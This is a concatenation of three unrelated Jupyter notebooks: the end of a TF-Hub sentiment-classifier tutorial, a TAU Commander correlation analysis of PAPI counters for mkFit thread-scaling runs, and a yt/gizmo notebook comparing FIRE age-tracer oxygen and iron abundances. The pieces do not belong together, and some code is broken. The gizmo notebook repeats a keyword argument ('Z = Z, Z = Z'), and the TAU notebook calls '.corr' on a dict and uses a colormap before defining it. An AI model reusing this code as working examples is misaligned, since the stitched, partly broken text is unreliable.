estimator.train(input_fn=train_input_fn, steps=5000); ``` # Prediction Run predictions for both training and test set. ``` train_eval_result = estimator.evaluate(input_fn=predict_train_input_fn) test_eval_result = estimator.evaluate(input_fn=predict_test_input_fn) print("Training set accuracy: {accuracy}".format(**train_eval_result)) print("Test set accuracy: {accuracy}".format(**test_eval_result)) ``` ## Confusion matrix We can visually check the confusion matrix to understand the distribution of misclassifications. ``` def get_predictions(estimator, input_fn): return [x["class_ids"][0] for x in estimator.predict(input_fn=input_fn)] LABELS = [ "negative", "positive" ] # Create a confusion matrix on training data. 
cm = tf.math.confusion_matrix(train_df["polarity"], get_predictions(estimator, predict_train_input_fn)) # Normalize the confusion matrix so that each row sums to 1. cm = tf.cast(cm, dtype=tf.float32) cm = cm / tf.math.reduce_sum(cm, axis=1)[:, np.newaxis] sns.heatmap(cm, annot=True, xticklabels=LABELS, yticklabels=LABELS); plt.xlabel("Predicted"); plt.ylabel("True"); ``` # Further improvements 1. **Regression on sentiment**: we used a classifier to assign each example into a polarity class. But we actually have another categorical feature at our disposal - sentiment. Here classes actually represent a scale and the underlying value (positive/negative) could be well mapped into a continuous range. We could make use of this property by computing a regression ([DNN Regressor](https://www.tensorflow.org/api_docs/python/tf/contrib/learn/DNNRegressor)) instead of a classification ([DNN Classifier](https://www.tensorflow.org/api_docs/python/tf/contrib/learn/DNNClassifier)). 2. **Larger module**: for the purposes of this tutorial we used a small module to restrict the memory use. There are modules with larger vocabularies and larger embedding space that could give additional accuracy points. 3. **Parameter tuning**: we can improve the accuracy by tuning the meta-parameters like the learning rate or the number of steps, especially if we use a different module. A validation set is very important if we want to get any reasonable results, because it is very easy to set-up a model that learns to predict the training data without generalizing well to the test set. 4. **More complex model**: we used a module that computes a sentence embedding by embedding each individual word and then combining them with average. One could also use a sequential module (e.g. [Universal Sentence Encoder](https://tfhub.dev/google/universal-sentence-encoder/2) module) to better capture the nature of sentences. Or an ensemble of two or more TF-Hub modules. 5. 
**Regularization**: to prevent overfitting, we could try to use an optimizer that does some sort of regularization, for example [Proximal Adagrad Optimizer](https://www.tensorflow.org/api_docs/python/tf/compat/v1/train/ProximalAdagradOptimizer). # Advanced: Transfer learning analysis Transfer learning makes it possible to **save training resources** and to achieve good model generalization even when **training on a small dataset**. In this part, we will demonstrate this by training with two different TF-Hub modules: * **[nnlm-en-dim128](https://tfhub.dev/google/nnlm-en-dim128/1)** - pretrained text embedding module, * **[random-nnlm-en-dim128](https://tfhub.dev/google/random-nnlm-en-dim128/1)** - text embedding module that has same vocabulary and network as **nnlm-en-dim128**, but the weights were just randomly initialized and never trained on real data. And by training in two modes: * training **only the classifier** (i.e. freezing the module), and * training the **classifier together with the module**. Let's run a couple of trainings and evaluations to see how using a various modules can affect the accuracy. 
``` def train_and_evaluate_with_module(hub_module, train_module=False): embedded_text_feature_column = hub.text_embedding_column( key="sentence", module_spec=hub_module, trainable=train_module) estimator = tf.estimator.DNNClassifier( hidden_units=[500, 100], feature_columns=[embedded_text_feature_column], n_classes=2, optimizer=tf.keras.optimizers.Adagrad(learning_rate=0.003)) estimator.train(input_fn=train_input_fn, steps=1000) train_eval_result = estimator.evaluate(input_fn=predict_train_input_fn) test_eval_result = estimator.evaluate(input_fn=predict_test_input_fn) training_set_accuracy = train_eval_result["accuracy"] test_set_accuracy = test_eval_result["accuracy"] return { "Training accuracy": training_set_accuracy, "Test accuracy": test_set_accuracy } results = {} results["nnlm-en-dim128"] = train_and_evaluate_with_module( "https://tfhub.dev/google/nnlm-en-dim128/1") results["nnlm-en-dim128-with-module-training"] = train_and_evaluate_with_module( "https://tfhub.dev/google/nnlm-en-dim128/1", True) results["random-nnlm-en-dim128"] = train_and_evaluate_with_module( "https://tfhub.dev/google/random-nnlm-en-dim128/1") results["random-nnlm-en-dim128-with-module-training"] = train_and_evaluate_with_module( "https://tfhub.dev/google/random-nnlm-en-dim128/1", True) ``` Let's look at the results. ``` pd.DataFrame.from_dict(results, orient="index") ``` We can already see some patterns, but first we should establish the baseline accuracy of the test set - the lower bound that can be achieved by outputting only the label of the most represented class: ``` estimator.evaluate(input_fn=predict_test_input_fn)["accuracy_baseline"] ``` Assigning the most represented class will give us accuracy of **50%**. There are a couple of things to notice here: 1. Maybe surprisingly, **a model can still be learned on top of fixed, random embeddings**. 
The reason is that even if every word in the dictionary is mapped to a random vector, the estimator can separate the space purely using its fully connected layers. 2. Allowing training of the module with **random embeddings** increases both training and test accuracy as oposed to training just the classifier. 3. Training of the module with **pre-trained embeddings** also increases both accuracies. Note however the overfitting on the training set. Training a pre-trained module can be dangerous even with regularization in the sense that the embedding weights no longer represent the language model trained on diverse data, instead they converge to the ideal representation of the new dataset.
github_jupyter
# Correlation Analysis Talapas TTbar70 Author: Brain Gravelle (gravelle@cs.uoregon.edu) All this is using the taucmdr python libraries from paratools http://taucommander.paratools.com/ <a href='#top'>top</a><br> ## Imports This section imports necessary libraies, the metrics.py and utilities.py files and sets up the window. <a id='top'></a> ``` # A couple of scripts to set the environent and import data from a .tau set of results from utilities import * from metrics import * # Plotting, notebook settings: %matplotlib inline #plt.rcParams.update({'font.size': 16}) import numbers from IPython.core.display import display, HTML display(HTML("<style>.container { width:100% !important; }</style>")) pd.set_option('display.float_format', lambda x: '%.2e' % x) pd.set_option('display.max_columns',100) pd.set_option('max_colwidth', 70) from IPython.core.interactiveshell import InteractiveShell InteractiveShell.ast_node_interactivity = "all" import copy ``` ## Getting Data <a id='data'></a> TAU Commander uses TAU to run the application and measure it using runtime sampling techniques (similar to Intel VTune). Many customization options are available. For example, we may consider each function regardless of calling context, or we may decide to enable callpath profiling to see each context separately. From the talapas_scaling application the following experiments are available. These use Talapas (with 28 thread Broadwell processors) and the build-ce (realistic) option for mkFit. The first six experiments use the --num-thr option to set the thread count which is intended to perform threading within the events. the last two add the --num-ev-thr option to set the event threads, so that all threads are used to process events in parallel and each event is processed by a single thread. 
* manual_scaling_Large_talapas * manual_scaling_Large_talapas_fullnode * manual_scaling_TTbar70_talapas * manual_scaling_TTbar70_talapas_fullnode * manual_scaling_TTbar35_talapas * manual_scaling_TTbar35_talapas_fullnode * ev_thr_scaling_Large_talapas * ev_thr_scaling_Large_talapas_fullnode Additionally available in the cori_scaling application are the following. These were run on NERSC's Cori on the KNL with the default memory settings (quad - 1 NUMA domain, cache - MCDRAM as direct mapped cache). See http://www.nersc.gov/users/computational-systems/cori/running-jobs/advanced-running-jobs-options/ for more info on the KNL modes. Similar to the talapas scaling they use the build-ce option and threading within each event. * manual_scaling_TTbar35 * manual_scaling_TTbar70 * manual_scaling_Large * mixed_thr_scaling_Large - this is bad ### Importing Scaling Data - Talapas TTbar70 is current Here we import the data. In this case we are using Cori data from the experiments with the threads working within each event using the TTbar70 file. Note that this box will take an hour or more to run; please go enjoy a coffee while you wait. 
``` application = "talapas_scaling" experiment = "manual_scaling_TTbar70_talapas_fullnode" # experiment = "manual_scaling_Large_talapas" # experiment = "ev_thr_scaling_Large_talapas" # application = "cori_scaling" # experiment = "manual_scaling_TTbar35" # experiment = "manual_scaling_TTbar70" # experiment = "manual_scaling_Large" # experiment = "mixed_thr_scaling_Large" path = ".tau/" + application + "/" + experiment + "/" # note that this function takes a long time to run, so only rerun if you must metric_data = get_pandas_scaling(path, callpaths=True) if application == "talapas_scaling": metric_data = remove_erroneous_threads(metric_data, [1, 8, 16, 32, 48, 56]) elif application == "cori_scaling": print(metric_data.keys()) metric_data = remove_erroneous_threads(metric_data, [1, 4, 8, 16, 32, 48, 64, 80, 96, 112, 128, 144, 160, 176, 192, 208, 224, 240, 256]) ``` ## Adding metrics <a id='metrics'></a> metrics are available in metrics.py. At this time the following can be added: * add_IPC(metrics) - Instructions per Cycle * add_CPI(metrics) - Cycles per instruction * add_VIPC(metrics) - vector instructions per cycle * add_VIPI(metrics) - vector instructions per instruction (i.e. 
fraction of total) * add_L1_missrate(metrics) - miss rate for L1 cache for scaling data please use the add_metric_to_scaling_data(data, metric_func) function to add a metric Here we add some predeefined metrics and print the top 10 functions with the best IPC ``` add_metric_to_scaling_data(metric_data, add_CPI) add_metric_to_scaling_data(metric_data, add_IPC) add_metric_to_scaling_data(metric_data, add_L1_missrate) add_metric_to_scaling_data(metric_data, add_L2_missrate) if application == 'cori_scaling': llc = True add_metric_to_scaling_data(metric_data, add_VIPI) else: llc = False # add_metric_to_scaling_data(metric_data, add_DERIVED_SP_VOPO) add_metric_to_scaling_data(metric_data, add_L3_missrate, llc) add_metric_to_scaling_data(metric_data, add_DERIVED_BRANCH_MR) print_available_metrics(metric_data, scaling=True) print(metric_data.keys()) # To test # metric_data[32]['DERIVED_SP_VOPO'].sort_values(by='Exclusive',ascending=False).head(10) ``` #### Combining metrics ``` thr_li = metric_data.keys() alldata = {} for thr in thr_li: alldata[thr] = combine_metrics(metric_data[thr],inc_exc='Exclusive') ``` ## Correlations <a id='corr'></a> ``` THREAD_CNT = 8 metric_li = ['PAPI_TOT_CYC','PAPI_RES_STL'] corrs = [alldata[THREAD_CNT].corr('pearson').fillna(0)[metric_li], alldata[THREAD_CNT].corr('kendall').fillna(0)[metric_li], alldata[THREAD_CNT].corr('spearman').fillna(0)[metric_li]] corr_data = corrs[0][['PAPI_TOT_CYC']].copy() corr_data['p_' + metric_li[0]] = corr_data[metric_li[0]] corr_data['p_' + metric_li[1]] = corrs[0][metric_li[1]] corr_data['k_' + metric_li[0]] = corrs[1][metric_li[0]] corr_data['k_' + metric_li[1]] = corrs[1][metric_li[1]] corr_data['s_' + metric_li[0]] = corrs[2][metric_li[0]] corr_data['s_' + metric_li[1]] = corrs[2][metric_li[1]] corr_data.drop(['PAPI_TOT_CYC'],axis=1,inplace=True) corr_data.style.format("{:.2%}").background_gradient(cmap=cm) ``` ## Correlations <a id='corr'></a> ``` THREAD_CNT = 32 cm = sns.light_palette("yellow", 
as_cmap=True) pcorr = get_corr(alldata[THREAD_CNT]) kcorr = get_corr(alldata[THREAD_CNT], method='kendall') scorr = get_corr(alldata[THREAD_CNT], method='spearman') metric_li = ['PAPI_TOT_CYC','PAPI_RES_STL'] corrs = [alldata.corr('pearson').fillna(0)[metric_li], alldata.corr('kendall').fillna(0)[metric_li], alldata.corr('spearman').fillna(0)[metric_li]] corr_data = corrs[0][['PAPI_TOT_CYC']].copy() corr_data['p_' + metric_li[0]] = corr_data[metric_li[0]] corr_data['p_' + metric_li[1]] = corrs[0][metric_li[1]] corr_data['k_' + metric_li[0]] = corrs[1][metric_li[0]] corr_data['k_' + metric_li[1]] = corrs[1][metric_li[1]] corr_data['s_' + metric_li[0]] = corrs[2][metric_li[0]] corr_data['s_' + metric_li[1]] = corrs[2][metric_li[1]] corr_data.drop(['PAPI_TOT_CYC'],axis=1,inplace=True) corr_data.style.format("{:.2%}").background_gradient(cmap=cm) ``` ## Correlations <a id='corr'></a> ``` THREAD_CNT = 56 cm = sns.light_palette("yellow", as_cmap=True) pcorr = get_corr(alldata[THREAD_CNT]) kcorr = get_corr(alldata[THREAD_CNT], method='kendall') scorr = get_corr(alldata[THREAD_CNT], method='spearman') metric_li = ['PAPI_TOT_CYC','PAPI_RES_STL'] corrs = [alldata.corr('pearson').fillna(0)[metric_li], alldata.corr('kendall').fillna(0)[metric_li], alldata.corr('spearman').fillna(0)[metric_li]] corr_data = corrs[0][['PAPI_TOT_CYC']].copy() corr_data['p_' + metric_li[0]] = corr_data[metric_li[0]] corr_data['p_' + metric_li[1]] = corrs[0][metric_li[1]] corr_data['k_' + metric_li[0]] = corrs[1][metric_li[0]] corr_data['k_' + metric_li[1]] = corrs[1][metric_li[1]] corr_data['s_' + metric_li[0]] = corrs[2][metric_li[0]] corr_data['s_' + metric_li[1]] = corrs[2][metric_li[1]] corr_data.drop(['PAPI_TOT_CYC'],axis=1,inplace=True) corr_data.style.format("{:.2%}").background_gradient(cmap=cm) ```
<!-- github_jupyter: export boundary — a second, unrelated notebook (FIRE/gizmo age-tracer abundance analysis) begins below -->
``` %matplotlib inline import numpy as np import matplotlib.pyplot as plt import yt from galaxy_analysis.gizmo import yield_model from galaxy_analysis.utilities import cy_convert_abundances as ca #from galaxy_analysis.utilities import convert_abundances as ca from galaxy_analysis.plot.plot_styles import * from matplotlib.ticker import (MultipleLocator, FormatStrFormatter, AutoMinorLocator) import gizmo_analysis as gizmo import utilities as gizmo_ut from scipy.stats import ks_2samp input_type = 'mass' # # How to generate yields: # simulation = 'm12q' wdir = "/home/aemerick/work/gizmo_runs/m12q_res5700_test/" #simulation = 'm10q_fiducial_post_constFB' #wdir = "/home/aemerick/work/gizmo_runs/m10q_test/full_fire_contFB/" #simulation = 'm10q_fiducial_post' #wdir = "/home/aemerick/work/gizmo_runs/m10q_test/full_fire_fiducial/" age_bins = yield_model.get_bins(config_file = wdir + "/gizmo.out", binfile = wdir+"/age_bins.txt") Z = 1.0E-3 FIRE_Z_scaling = True age_is_fraction = True total_yields = yield_model.construct_yields(age_bins/1000.0, # pass bins as Gyr, Z = Z, Z = Z, yieldtype = 'total', FIRE_Z_scaling=FIRE_Z_scaling) # load ds and generate yields #np.log10(ds0.hubble_constant) ds0 = yt.load(wdir + 'output/snapshot_000.hdf5') data0 = ds0.all_data() fields = ds0.field_list # generate yield_model.generate_metal_fields(ds0,_agebins=age_bins,_yields=total_yields, age_is_fraction=age_is_fraction) #yield_model._generate_star_metal_fields(ds0, _agebins = age_bins, _yields = total_yields) metals = np.unique([x[1] for x in ds0.field_list if ((x[0] == 'PartType0') and ('Metal' in x[1]))]) initial_abundance=np.zeros(15) for i in np.arange(np.size(initial_abundance)): z = data0[('PartType0','Metallicity_%02i'%(i))] print("%5.5E %5.5E %5.5E"%(np.min(z),np.max(z),np.average(z))) initial_abundance[i] = np.average(z).value #print(np.min(z).value,np.average(z).value,np.max(z).value) logH = np.log10(ds0.hubble_constant) ds = yt.load(wdir + 'output/snapshot_479.hdf5') data = 
ds.all_data() fields = ds.field_list # generate yield_model.generate_metal_fields(ds,_agebins=age_bins,_yields=total_yields,age_is_fraction=age_is_fraction) yield_model._generate_star_metal_fields(ds, _agebins = age_bins, _yields = total_yields,age_is_fraction=age_is_fraction) ptypes = np.unique([x[0] for x in ds.field_list]) metals = np.unique([x[1] for x in ds.field_list if ((x[0] == 'PartType0') and ('Metal' in x[1]))]) print(np.min(data[('PartType0','particle_mass')].to('Msun'))) M_norm = np.min(data[('PartType0','particle_mass')].to('Msun') ) print(np.median(data[('PartType4','Metallicity_00')])) print(np.average(data[('PartType4','Metallicity_00')])) x = data[('all','PartType0_O_mass')] print(np.min(x),np.max(x)) part = gizmo.io.Read.read_snapshots(['star'], 'index', 342, assign_host_principal_axes=True, simulation_directory = wdir) print(part.host_positions) SpeciesProfile = gizmo_ut.particle.SpeciesProfileClass(scaling='log', limits=[0.1, 10], width=0.1, dimension_number=2) pro = SpeciesProfile.get_sum_profiles(part, 'star', 'mass', rotation=True, other_axis_distance_limits=[0, 1]) SpeciesProfile.get_sum_profiles? SpeciesProfile.get_sum_profiles? 
part.host_positions print(ds.mass_unit.to('g/h').value / ds.mass_unit.to('g').value) #ds.derived_field_list normal = part.host_rotation_tensors[0] center = part.host_positions[0] #region = #ds.disk(center, normal, 20000, 4000) region = ds.box(center - 20000, center + 20000) yfield = [ ('all','PartType0_O_actual_mass'),('all','PartType0_O_mass'), ('all','PartType0_Fe_actual_mass'),('all','PartType0_Fe_mass'), ('all','PartType0_Mg_actual_mass'),('all','PartType0_Mg_mass') ] xfield = ('PartType0','particle_spherical_position_radius') sp = yt.Profile1D(region, xfield, #('PartType0','Metallicity_00'), x_min = np.min(region[xfield]), x_max =np.max(region[xfield]), x_log=False, x_n = 100, weight_field = None) # ('PartType0','particle_mass') ) #sp.set_log(('PartType0','particle_spherical_position_radius'),False) #sp.set_unit(('PartType0','particle_spherical_position_radius'),'kpc') #sp.set_unit(yfield[0], "Msun") #sp.set_unit(yfield[1], "Msun") #sp.show() sp.add_fields(yfield) for i in np.arange(len(yfield)): sp.set_field_unit(yfield[i], "Msun") pm = data[('PartType0','particle_mass')].to('Msun') ageO = data[('all','PartType0_O_mass')] / ds0.hubble_constant + initial_abundance[4]*pm actualO = pm * data[('PartType0','Metallicity_04')] select = data[('PartType0','Temperature')] > 1.0E6 diff = np.abs((ageO[select] - actualO[select]) / actualO[select]) print (np.average(diff)) ds.add_field? 
parttype = 'PartType4'
e = 'O'

def fractional_diff4(field, data):
    """|age-tracer O mass (1/h-corrected) - tracked O mass| / tracked O mass
    for `parttype` particles; the initial abundance floor is added back to
    the age-tracer side."""
    pm = data[(parttype, 'particle_mass')].to('Msun')
    ageO = data[('all', parttype + '_' + e + '_mass')] / ds0.hubble_constant + initial_abundance[4] * pm
    actualO = pm * data[(parttype, 'Metallicity_04')]
    fractional_diff = np.abs((ageO - actualO) / actualO)
    return fractional_diff

def fractional_diff4_2(field, data):
    """Same as fractional_diff4 but WITHOUT the 1/h correction on the
    age-tracer mass, to isolate the little-h effect."""
    pm = data[(parttype, 'particle_mass')].to('Msun')
    ageO = data[('all', parttype + '_' + e + '_mass')] + initial_abundance[4] * pm
    actualO = pm * data[(parttype, 'Metallicity_04')]
    fractional_diff = np.abs((ageO - actualO) / actualO)
    return fractional_diff

ds.add_field(('all', parttype + '_O_fractional_diff4'),
             function=fractional_diff4, units='', particle_type='PartType4')
ds.add_field(('all', parttype + '_O_fractional_diff4_2'),
             function=fractional_diff4_2, units='', particle_type='PartType4')

# BUG FIX: these two assignments were commented out, so the prints below
# failed with NameError in the saved notebook state.
diff_one = data[('all', 'PartType4_O_fractional_diff4')]
diff_two = data[('all', 'PartType4_O_fractional_diff4_2')]
print(np.min(diff_one), np.max(diff_one), np.average(diff_one))
print(np.min(diff_two), np.max(diff_two), np.average(diff_two))

data[('PartType0', 'particle_mass')]

#x = np.log10(data[(parttype + '_' + e + '_fractional_diff3')])
#hist,bins = np.histogram( x, bins = np.arange(-20,2,0.1))
#ax.step(bins[:-1],hist / (1.0*np.sum(hist)),where='post')
#x = np.log10(data[(parttype + '_' + e + '_fractional_diff2')])
#hist,bins = np.histogram( x, bins = np.arange(-20,2,0.1))
#ax.step(bins[:-1],hist / (1.0*np.sum(hist)),where='post')

e = 'O'

#x = np.log10(data[(parttype + '_' + e + '_fractional_diff')])
#hist,bins = np.histogram( x, bins = np.arange(-20,2,0.1))
#ax.step(bins[:-1],hist / (1.0*np.sum(hist)),where='post')

fig, ax = plt.subplots(1, 2)
fig.set_size_inches(12, 6)

# Gas-phase comparison of age-tracer vs. tracked oxygen totals.
parttype = 'PartType0'
pm = data[(parttype, 'particle_mass')].to('Msun')
ageO = data[('all', parttype + '_' + e + '_mass')].to('Msun') + initial_abundance[4] * pm
actualO = pm * data[(parttype, 'Metallicity_04')]
print(np.average(actualO / ageO))
temp = data[('all',parttype + '_' + e + '_mass')] #temp[temp<=0.0] = 1.0E-20 print(np.max(actualO / (temp/ ds0.hubble_constant))) #print(np.average()) print(np.sum(ageO)/1.0E6, np.sum(actualO)/1.0E6, np.sum(actualO)/np.sum(ageO)) hist,bins = np.histogram( np.log10(ageO), bins = np.arange(-2,6,0.1)) ax[0].step(bins[:-1], hist/(1.0*np.sum(hist)), where = 'post', label = 'Age') hist,bins = np.histogram( np.log10(actualO), bins = np.arange(-2,6,0.1)) ax[0].step(bins[:-1], hist/(1.0*np.sum(hist)), where = 'post', label = 'Actual') parttype = 'PartType4' pm = data[(parttype, 'particle_mass')].to('Msun') ageO = data[('all',parttype + '_' + e + '_mass')] + initial_abundance[4]*pm actualO = pm * data[(parttype,'Metallicity_04')] hist,bins = np.histogram( np.log10(ageO), bins = np.arange(-2,6,0.1)) ax[1].step(bins[:-1], hist/(1.0*np.sum(hist)), where = 'post', label = 'Age') hist,bins = np.histogram( np.log10(actualO), bins = np.arange(-2,6,0.1)) ax[1].step(bins[:-1], hist/(1.0*np.sum(hist)), where = 'post', label = 'Actual') ax[1].semilogy() ax[0].semilogy() ax[0].legend(loc='best') for a in ax: a.set_xlim(-2,5) #plt.semilogx() age_vals = np.array([data[('PartType0',"Metallicity_%02i"%(15+i))] for i in np.arange(np.size(age_bins) - 1)]) print(np.shape(age_vals)) print(np.shape(total_yields[:,4])) x = np.matmul(total_yields[:,4].T, age_vals) * data[('PartType0','particle_mass')].to('code_mass').value * yt.units.Msun x = x / ds0.hubble_constant + data[('PartType0','particle_mass')].to('Msun') * initial_abundance[4] print(np.sum( data0[('PartType0','particle_mass')].to('Msun') * initial_abundance[4] )) print(x[1000]) print((data[('all','PartType0_O_mass')]/ds.hubble_constant + data[('PartType0','particle_mass')].to('Msun')*initial_abundance[3])[1]) print(data[('all','PartType0_O_actual_mass')][1]) np.average(x / data[('all','PartType0_O_actual_mass')]) parttype = 'PartType0' pm = data[(parttype, 'particle_mass')].to('Msun') ageO = data[('all',parttype + '_' + e + '_mass')] + 
initial_abundance[4]*pm actualO = pm * data[(parttype,'Metallicity_04')] select = actualO > 5.0E3 #print(actualO[select]/ageO[select]) x = data[('PartType0','Temperature')] x = x[select] print(np.min(x),np.max(x),np.quantile(x,0.25),np.median(x),np.quantile(x,0.75),np.average(x)) x = data[('PartType0','Density')].to('g/cm**3') x = x[select] print(np.min(x),np.max(x),np.quantile(x,0.25),np.median(x),np.quantile(x,0.75),np.average(x)) region = ds.sphere(part.host_positions[0], 20000) x1 = part.host_positions[0][0] - data[('PartType0','particle_position_x')].to('kpccm').value y1 = part.host_positions[0][1] - data[('PartType0','particle_position_y')].to('kpccm').value z1 = part.host_positions[0][2] - data[('PartType0','particle_position_z')].to('kpccm').value x = np.sqrt(x1*x1 + y1*y1 + z1*z1) x = x[select] print(np.min(x),np.max(x),np.quantile(x,0.25),np.median(x),np.quantile(x,0.75),np.average(x)) hist,bins = np.histogram(x, bins = np.arange(0.0,1000.0,10.)) plt.step(bins[:-1],hist,lw=3,color='black',where='post') plt.xlabel('Radius (kpc)') x = data[('PartType0','particle_mass')].to('Msun') x = x[select] print(np.min(x),np.max(x),np.quantile(x,0.25),np.median(x),np.quantile(x,0.75),np.average(x)) yt.units.kpc parttype = 'PartType0' e = 'O' def fractional_diff(field, data): pm = data[(parttype, 'particle_mass')].to('Msun') ageO = data[('all',parttype + '_' + e + '_mass')] + initial_abundance[4]*pm actualO = pm * data[(parttype,'Metallicity_04')] fractional_diff = np.abs((ageO - actualO) / actualO) return fractional_diff ds.add_field(('all',parttype + '_O_fractional_diff'), function=fractional_diff, units='', particle_type = 'PartType0') def fractional_diff2(field, data): pm = data[(parttype, 'particle_mass')].to('Msun') ageO = data[('all',parttype + '_' + e + '_mass')] + initial_abundance[4]*pm actualO = pm * data[(parttype,'Metallicity_04')] fractional_diff = np.abs((ageO - actualO) / actualO) return fractional_diff ds.add_field(('all',parttype + 
'_O_fractional_diff2'), function=fractional_diff2, units='', particle_type = 'PartType0') def fractional_diff3(field, data): pm = data[(parttype, 'particle_mass')].to('Msun') ageO = data[('all',parttype + '_' + e + '_mass')] + initial_abundance[4]*pm actualO = pm * data[(parttype,'Metallicity_04')] fractional_diff = np.abs((ageO - actualO) / actualO) return fractional_diff ds.add_field(('all',parttype + '_O_fractional_diff3'), function=fractional_diff3, units='', particle_type = 'PartType0') xaxisfield = ('PartType0','Density') pp = yt.PhasePlot(ds, xaxisfield, (parttype + '_' + e + '_fractional_diff3'), ('PartType0','particle_mass'), weight_field=None) pp.set_ylim(1.0E-6,200.0) pp.set_log(('all','PartType0_O_fractional_diff3'),True) pp.set_log(xaxisfield,True) pp.set_unit(('PartType0','particle_mass'),'Msun') #pp.set_log(('PartType0','Temperature'),True) pp.show() yt.PhasePlot? print(data[('PartType0','particle_mass')].to('Msun')[0].to('Msun/h')) print(data[('PartType0','particle_mass')].to('Msun')[0].to('Msun')) #print(data[('PartType0','particle_mass')].to('Msun')[0].to('gcm')) fig, ax = plt.subplots() y1 = sp[('all','PartType0_Mg_actual_mass')].value y2 = sp[('all','PartType0_Mg_mass')].value #ax.plot( sp.x, y1, color = 'C0', lw = 3) #ax.plot( sp.x, y2, color = 'C1', lw = 3) ax.plot(sp.x.to('kpccm'), y1/y2) #ax.semilogy() def _get_abund(e,dat,ptype='star'): if ptype == 'star': ptype = "PartType4" elif ptype == 'gas': ptype = "PartType0" if e == "H": return 1.0 - dat[(ptype,"Metallicity_00")] - dat[(ptype,"Metallicity_01")] else: ei = yield_model.elements.index(e) return dat[(ptype,"Metallicity_%02i"%(ei))] # # Now plot for age tracers # littleh = 1.0 def _get_age_abund(e,dat,ptype='star'): if ptype == 'star': ptype = "PartType4" elif ptype == 'gas': ptype = "PartType0" if e == "H": # H_frac = 1.0 - dat[(ptype,"Metallicity_00")] - dat[(ptype,"Metallicity_01")] M = dat[(ptype,'particle_mass')].to('Msun') H_frac = 
M*(1.0-initial_abundance[0]-initial_abundance[1])-\ dat[('all',ptype+'_Total_mass')] / littleh - dat[('all',ptype+'_He_mass')] / littleh H_frac = H_frac / dat[(ptype,'particle_mass')].to('Msun') return H_frac else: ei = yield_model.elements.index(e) # very bad!!! mass = dat[('all', ptype + '_' + e + '_mass')].to('Msun') / littleh norm = dat[(ptype,'particle_mass')].to('Msun') # M_norm # (16752.063237698454*yt.units.Msun) Z = mass / norm Z = Z + initial_abundance[yield_model.elements.index(e)] return Z# mass/norm #+ initial_abundance[yield_model.elements.index(e)] def get_ratio(e1,e2,dat,age=True): if age: vals1 = _get_age_abund(e1,dat) vals2 = _get_age_abund(e2,dat) else: vals1 = _get_abund(e1,dat) vals2 = _get_abund(e2,dat) return ca.abundance_ratio_array(e1,vals1,e2,vals2, input_type=input_type) # # Lets try and plot O / Fe vs Fe / H # for the fiducial fire stuff # elements y1e,y2e = "O", "Fe" x1e,x2e = "Fe", "H" # #y1, y2 = yield_model.elements.index(y1e), yield_model.elements.index(y2e) #x1, x2 = yield_model.elements.index(x1e), yield_model.elements.index(x2e) y1_vals = _get_abund(y1e,data) y2_vals = _get_abund(y2e,data) y1y2 = ca.abundance_ratio_array(y1e, y1_vals, y2e, y2_vals, input_type=input_type) x1_vals = _get_abund(x1e,data) x2_vals = _get_abund(x2e,data) x1x2 = ca.abundance_ratio_array(x1e, x1_vals, x2e, x2_vals, input_type = input_type) fig, ax = plt.subplots() fig.set_size_inches(8,8) ax.scatter(x1x2, y1y2, color = "black", s = 60, marker="o", label = "FIRE") y1_vals = _get_age_abund(y1e,data) y2_vals = _get_age_abund(y2e,data) age_y1y2 = ca.abundance_ratio_array(y1e, y1_vals, y2e, y2_vals, input_type=input_type) x1_vals = _get_age_abund(x1e,data) x2_vals = _get_age_abund(x2e,data) age_x1x2 = ca.abundance_ratio_array(x1e, x1_vals, x2e, x2_vals, input_type = input_type) print(np.min(y1y2),np.max(y1y2)) print(np.min(x1x2),np.max(x1x2)) ax.scatter(age_x1x2, age_y1y2, color = "C0", s = 60, marker="o", label = "Age Tracer") ax.set_ylabel("[" + y1e + "/" + 
y2e + "]") ax.set_xlabel("[" + x1e + "/" + x2e + "]") ax.legend(loc='best') ax.set_xlim(-5,1) ax.set_ylim(-3,3) plt.minorticks_on() plt.tight_layout() #x1e = 'O' #x2e = 'H' def MDF(x1e,x2e,data,rmin=None,rmax=None,dbin=0.25, age=True, ptype='star', diff = False, absval=False): """ Return MDF """ if (absval) and (not diff): print("Are you sure you want to take the absolute value of hte abundance if it is not a diff?") raise ValueError if diff: x1_vals_age = _get_age_abund(x1e,data,ptype=ptype) x2_vals_age = _get_age_abund(x2e,data,ptype=ptype) x1_vals = _get_abund(x1e,data,ptype=ptype) x2_vals = _get_abund(x2e,data,ptype=ptype) abund_age = ca.abundance_ratio_array(x1e, x1_vals_age, x2e, x2_vals_age, input_type=input_type) abund = ca.abundance_ratio_array(x1e, x1_vals, x2e, x2_vals, input_type=input_type) cutvals1 = _get_abund('O',data,ptype=ptype) cutvals2 = _get_abund('H',data,ptype=ptype) H_cut = ca.abundance_ratio_array('O',cutvals1,'H',cutvals2,input_type=input_type) #abund = abund[ (H_cut > -2.6)] #abund_age = abund_age[ (H_cut > -2.6)] if absval: abund = np.abs(abund - abund_age) # diff else: abund = abund-abund_age else: if age: x1_vals = _get_age_abund(x1e,data,ptype=ptype) x2_vals = _get_age_abund(x2e,data,ptype=ptype) else: x1_vals = _get_abund(x1e,data,ptype=ptype) x2_vals = _get_abund(x2e,data,ptype=ptype) abund = ca.abundance_ratio_array(x1e, x1_vals, x2e, x2_vals, input_type=input_type) if ptype == 'gas': cutvals1 = _get_abund('O',data,ptype=ptype) cutvals2 = _get_abund('H',data,ptype=ptype) H_cut = ca.abundance_ratio_array('O',cutvals1,'H',cutvals2,input_type=input_type) abund = abund[ (H_cut > -2.6)] if rmin is None: rmin = np.min(abund) if rmax is None: rmax = np.max(abund) nbins = int((rmax - rmin)/dbin) hist, bins = np.histogram(abund, bins = nbins, range = (rmin,rmax)) hist2 = np.ones(np.size(hist)+1) hist2[:-1] = hist hist2[-1] = hist2[-2] stats = {'median' : np.median(abund), 'mean' : np.average(abund), 'Q1' : np.quantile(abund,0.25), 'Q3' : 
